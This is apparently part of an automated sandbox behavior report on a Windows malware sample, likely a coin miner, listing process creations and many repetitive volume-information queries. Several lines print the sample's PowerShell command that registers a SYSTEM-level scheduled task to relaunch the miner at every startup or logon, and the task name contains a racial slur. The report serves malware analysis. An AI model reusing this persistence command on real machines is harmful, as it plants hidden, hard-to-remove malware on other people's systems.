                Source: C:\Program Files\MINA\m.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exeJump to behavior
                Source: C:\Program Files\MINA\m.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#zgpcu#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'mineineynigga' /tr '''c:\program files\mina\m.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\mina\m.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'mineineynigga' -user 'system' -runlevel 'highest' -force; }
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#zgpcu#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'mineineynigga' /tr '''c:\program files\mina\m.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\mina\m.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'mineineynigga' -user 'system' -runlevel 'highest' -force; }
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#kbbksn#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'mineineynigga' /tr '''c:\program files\mina\m.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\mina\m.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'mineineynigga' -user 'system' -runlevel 'highest' -force; }
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#zgpcu#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'mineineynigga' /tr '''c:\program files\mina\m.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\mina\m.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'mineineynigga' -user 'system' -runlevel 'highest' -force; }
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.32403.24162.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#zgpcu#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'mineineynigga' /tr '''c:\program files\mina\m.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\mina\m.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'mineineynigga' -user 'system' -runlevel 'highest' -force; }Jump to behavior
                Source: C:\Program Files\MINA\m.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#zgpcu#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'mineineynigga' /tr '''c:\program files\mina\m.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\mina\m.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'mineineynigga' -user 'system' -runlevel 'highest' -force; }Jump to behavior
                Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#kbbksn#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'mineineynigga' /tr '''c:\program files\mina\m.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\mina\m.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'mineineynigga' -user 'system' -runlevel 'highest' -force; }Jump to behavior
                Source: C:\Program Files\MINA\m.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#zgpcu#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'mineineynigga' /tr '''c:\program files\mina\m.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\mina\m.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'mineineynigga' -user 'system' -runlevel 'highest' -force; }Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
